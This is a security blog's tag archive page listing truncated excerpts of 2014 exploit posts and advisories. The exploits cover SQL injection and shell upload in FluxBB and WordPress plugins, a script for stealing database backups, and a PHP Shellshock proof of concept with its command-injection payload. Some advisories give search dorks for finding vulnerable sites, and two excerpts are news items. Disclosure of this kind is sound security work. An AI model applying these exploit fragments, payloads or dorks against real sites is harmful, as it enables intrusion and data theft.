Tags archives: sicurezza

 

0

FluxBB 1.5.6 SQL Injection

#!/usr/bin/env python # Friday, November 21, 2014 – secthrowaway@safe-mail.net # FluxBB <= 1.5.6 SQL Injection # make sure that your IP is reachable   url = ‘http://target.tld/forum/’ user = ‘user’ # dummy account pwd = ‘test’   import urllib, sys, smtpd, asyncore, re, sha from email import message_from_string from urllib2 import Request, urlopen   ua [...]

 

0

WordPress wpDataTables 1.5.3 Shell Upload

#!/usr/bin/python # # Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability # # Vulnerability discovered by Claudio Viviani # # Date : 2014-11-22 # # Exploit written by Claudio Viviani # # Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc # # ——————————————————————– # # Issue n.1 (wpdatatables.php) # # This function is always available without wpdatatables [...]

 

0

WordPress wpDataTables 1.5.3 SQL Injection

###################### # Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Software Link : http://wpdatatables.com (Premium) # Date : 2014-11-22 # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1.0-dev-5b2ded0 ######################   # Description [...]

 

0

WordPress WP-DB-Backup 2.2.4 Backup Theft

#!/bin/bash #Larry W. Cashdollar, @_larry0 #Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on #20141031 assumes the wordpress database is wordpress and the table prefix is wp_ #http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/ #http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/ #run ./exp targetsite   DATE=”20141031″; #Date to search   if [ ! -e rainbow ]; then [...]

 

0

PHP 5.x / Bash Shellshock Proof Of Concept

<?php   // Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit // Date: 22/11/2014 // Exploit Author: ssbostan // Vendor Homepage: http://www.gnu.org/software/bash/ // Software Link: http://ftp.gnu.org/gnu/bash/ // Version: <= 4.3 // Tested on: Fedora 17, Ubuntu 8.04 // CVE: http://www.cvedetails.com/cve/CVE-2014-6271/   if(isset($_GET["cmd"]) && !empty($_GET["cmd"])) { $file=tempnam(“/tmp”, “xpl”); putenv(“PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}”); mail(“xpl@localhost”, [...]

 

0

Researchers Uncover Government Spy Tool Used to Hack Telecoms and Belgian Cryptographer

It was the spring of 2011 when the European Commission discovered it had been hacked. The intrusion into the EU’s legislative body was sophisticated and widespread and used a zero-day exploit to get in. Once the attackers established a stronghold on the network, they were in for the long haul. They scouted the network architecture [...]

 

0

Feminist Hacker Barbie Is Just What Our Little Girls Need

There’s an illustrated book called “Barbie: I Can be a Computer Engineer,” and everyone we know hated it. Packed with “Over 50 Stickers!,” it dreams up a computer engineering version of Barbie who seems better at taking praise for other people’s work than doing any actual coding. It prompted some serious outrage on the net [...]

 

0

Supr Shopsystem 5.1.0 Cross Site Scripting

Document Title: =============== Supr Shopsystem v5.1.0 – Persistent UI Vulnerability     References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1353     Release Date: ============= 2014-11-07     Vulnerability Laboratory ID (VL-ID): ==================================== 1353     Common Vulnerability Scoring System: ==================================== 3.1     Product & Service Introduction: =============================== SUPR is a modern and user-friendly system which allows each [...]

 

0

WordPress CM Download Manager 2.0.0 Code Injection

Vulnerability title: Code Injection in Wordpress CM Download Manager plugin CVE: CVE-2014-8877 Plugin: CM Download Manager plugin Vendor: CreativeMinds – https://www.cminds.com/ Product: https://wordpress.org/plugins/cm-download-manager/ Affected version: 2.0.0 and previous version Fixed version: 2.0.4 Google dork: inurl:cmdownloads Reported by: Phi Le Ngoc – phi.n.le@itas.vn Credits to ITAS Team – www.itas.vn     ::DESCRITION::   The code injection [...]

 

0

WordPress SP Client Document Manager 2.4.1 SQL Injection

Vulnerability title: Multiple SQL Injection in SP Client Document Manager plugin Plugin: SP Client Document Manager Vendor: http://smartypantsplugins.com Product: https://wordpress.org/plugins/sp-client-document-manager/ Affected version: version 2.4.1 and previous version Fixed version: N/A Google dork: inurl:wp-content/plugins/sp-client-document-manager Reported by: Dang Quoc Thai – thai.q.dang (at) itas (dot) vn Credits to ITAS Team – www.itas.vn     ::DESCRITION::   Multiple [...]